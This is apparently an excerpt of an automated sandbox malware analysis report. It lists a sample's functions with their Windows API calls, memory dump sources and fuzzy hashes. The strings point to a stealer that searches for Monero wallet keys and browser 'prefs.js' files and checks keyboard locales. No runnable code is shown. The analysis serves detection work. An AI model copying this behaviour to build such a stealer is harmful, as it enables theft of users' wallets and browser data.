                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 890499440a7b517e1196c1a7aa592bda45fd61d1c90f2eadac5b1f42b3f440df
                                  • Instruction ID: 9d23879d6003dbc1c913b10b8cbaf82d36b8118aefcf6d923fdd12ec4f8a389a
                                  • Opcode Fuzzy Hash: 890499440a7b517e1196c1a7aa592bda45fd61d1c90f2eadac5b1f42b3f440df
                                  • Instruction Fuzzy Hash: 6D617CB1910218ABCB20EFA1EC49FEE737CBB48701F044688F64996141EB75EB85CF95
                                  Function 00724570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00724580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00724587
                                  • wsprintfA.USER32 ref: 007245A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007245BD
                                  • StrCmpCA.SHLWAPI(?,00730FC4), ref: 007245EB
                                  • StrCmpCA.SHLWAPI(?,00730FC8), ref: 00724601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0072468B
                                  • FindClose.KERNEL32(000000FF), ref: 007246A0
                                  • lstrcat.KERNEL32(?,0122F5F8), ref: 007246C5
                                  • lstrcat.KERNEL32(?,0122E920), ref: 007246D8
                                  • lstrlen.KERNEL32(?), ref: 007246E5
                                  • lstrlen.KERNEL32(?), ref: 007246F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 7d62604768ddda205e11ef0d55ba29cbd77d7f93f11537e5de58029e11a78f72
                                  • Instruction ID: df83cf7ac8ead0ecb019921f2828da2fde45c1789fce89386e740b57ea353f88
                                  • Opcode Fuzzy Hash: 7d62604768ddda205e11ef0d55ba29cbd77d7f93f11537e5de58029e11a78f72
                                  • Instruction Fuzzy Hash: CC5188B1914318ABCB60EB71DC89FED737CAB58301F404688F74996190EB799B84CF96
                                  Function 00723EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00723EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00723EDA
                                  • StrCmpCA.SHLWAPI(?,00730FAC), ref: 00723F08
                                  • StrCmpCA.SHLWAPI(?,00730FB0), ref: 00723F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0072406C
                                  • FindClose.KERNEL32(000000FF), ref: 00724081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 4b3ffd29a03d2ef36483cdaaaa163b4f745e8835cb9ee67c99cd0ae03593514b
                                  • Instruction ID: 2a118dd2d309945af9e1946564c11af726f260825d8674189b73b926ff7aa207
                                  • Opcode Fuzzy Hash: 4b3ffd29a03d2ef36483cdaaaa163b4f745e8835cb9ee67c99cd0ae03593514b
                                  • Instruction Fuzzy Hash: 035148B2914218EBCB24EBB4DC89EEE737CBB44301F404688B75996041DB79AB858F95
                                  Function 0071ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0071ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0071ED55
                                  • StrCmpCA.SHLWAPI(?,00731538), ref: 0071EDAB
                                  • StrCmpCA.SHLWAPI(?,0073153C), ref: 0071EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0071F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 1a1dc71965b411150ecea7cc79fb89ac09601cfbc75c4071c6322bc97771beb9
                                  • Instruction ID: 5f12765ac5eaf32ffcf577a85fd9bd6882dd70b20b24b55c91c5749bbc8e10dd
                                  • Opcode Fuzzy Hash: 1a1dc71965b411150ecea7cc79fb89ac09601cfbc75c4071c6322bc97771beb9
                                  • Instruction Fuzzy Hash: 47E1E371911128EBEB55FB60EC56EEE7378AF54300F4045A9F50A62092EE386F8ACF51
                                  Function 0071F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007315B8,00730D96), ref: 0071F71E
                                  • StrCmpCA.SHLWAPI(?,007315BC), ref: 0071F76F
                                  • StrCmpCA.SHLWAPI(?,007315C0), ref: 0071F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0071FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: acb33f27f705413a7cc501d6b1968beea46f77dc2db0208fb1ec83af1dbfa275
                                  • Instruction ID: 34cadb3299d684dfb58e52288ccc0c8e434d3e8e8cd8439834884ba4b802dd5e
                                  • Opcode Fuzzy Hash: acb33f27f705413a7cc501d6b1968beea46f77dc2db0208fb1ec83af1dbfa275
                                  • Instruction Fuzzy Hash: 8DB14971910114EBDB24FF64EC5AEED7379AF54300F4085A8E50A97192EF386B49CF92
                                  Function 007116D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0073510C,?,?,?,007351B4,?,?,00000000,?,00000000), ref: 00711923
                                  • StrCmpCA.SHLWAPI(?,0073525C), ref: 00711973
                                  • StrCmpCA.SHLWAPI(?,00735304), ref: 00711989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00711D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00711DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00711E20
                                  • FindClose.KERNEL32(000000FF), ref: 00711E32
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: c03b40712af9a3c730478f80a00d1fd5e60c1cb2336deeb278658f037b4c7cdd
                                  • Instruction ID: 0ae787c2bb13c9d403437392a984ef3657d507bc99dc4f4e6b0cec679ecd3bcd
                                  • Opcode Fuzzy Hash: c03b40712af9a3c730478f80a00d1fd5e60c1cb2336deeb278658f037b4c7cdd
                                  • Instruction Fuzzy Hash: D612E371910128EBDB19FB60EC9AEEE7378AF54300F4045A9F54666091EF386F89CF91
                                  Function 0071DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00730C2E), ref: 0071DE5E
                                  • StrCmpCA.SHLWAPI(?,007314C8), ref: 0071DEAE
                                  • StrCmpCA.SHLWAPI(?,007314CC), ref: 0071DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0071E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: f63c9fc101ad4313fecece51b009441207d978c0df51638e7298b4516db18d70
                                  • Instruction ID: 639e89d1b168b5b3ce83f4afea08daabaf2c5b6040af56539572daa2a59d0213
                                  • Opcode Fuzzy Hash: f63c9fc101ad4313fecece51b009441207d978c0df51638e7298b4516db18d70
                                  • Instruction Fuzzy Hash: 6FF18171814128EBDB16EB60DC99EEE7378BF58300F8045A9F50A62091EF386F89CF55
                                  Function 00ADD30D Relevance: 14.2, Strings: 10, Instructions: 1652COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *$!%~g$!<gn$E=0c$Jk*$ZNl|$`1?v$bMy$dN d$d[;+
                                  • API String ID: 0-2575394991
                                  • Opcode ID: 95d3e703b5034bc57ec4bf572588eb79c6e229ded0936f720eecedf2594e9da3
                                  • Instruction ID: 2aa072943c16b5aa21ccc4722d967ff3a17e91659d32b7e438b062cd8be6645e
                                  • Opcode Fuzzy Hash: 95d3e703b5034bc57ec4bf572588eb79c6e229ded0936f720eecedf2594e9da3
                                  • Instruction Fuzzy Hash: C0B207F3A0C204AFE304AE2DEC8567AB7E9EF94760F16493DEAC5C3744E63558018697
                                  Function 0071DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007314B0,00730C2A), ref: 0071DAEB
                                  • StrCmpCA.SHLWAPI(?,007314B4), ref: 0071DB33
                                  • StrCmpCA.SHLWAPI(?,007314B8), ref: 0071DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0071DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 658874ada4ceb4fcff2dbee3233e302b97217b748e0f85f482b2a8eb38a508db
                                  • Instruction ID: 5030dfb2a0393069e26de755285f0a97a32dd6c1889ccb93ea82ca927b6cbb19
                                  • Opcode Fuzzy Hash: 658874ada4ceb4fcff2dbee3233e302b97217b748e0f85f482b2a8eb38a508db
                                  • Instruction Fuzzy Hash: E6913872910214EBCB14FB74FC5A9ED737DAF88300F408668F94696181EE3C9B59CB96
                                  Function 00727B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,007305AF), ref: 00727BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00727BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00727C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00727C62
                                  • LocalFree.KERNEL32(00000000), ref: 00727D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
